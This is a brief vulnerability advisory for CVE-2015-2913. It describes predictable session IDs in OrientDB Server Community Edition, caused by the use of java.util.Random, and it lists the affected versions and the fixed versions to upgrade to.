CVE-2015-2913

Name of the Vulnerable Software and Affected Versions OrientDB Server Community Edition versions 2.0.0 through 2.0.14 OrientDB Server Community Edition versions 2.1.x prior to 2.1.1

Description The issue arises from the improper reliance on the java.util.Random class for generating random Session ID values in the server/network/protocol/http/OHttpSessionManager.java file. This makes it easier for remote attackers to predict a Session ID value by determining the internal state of the PRNG in this class.

Recommendations For OrientDB Server Community Edition versions 2.0.0 through 2.0.14, update to version 2.0.15 or later. For OrientDB Server Community Edition versions 2.1.x prior to 2.1.1, update to version 2.1.1 or later.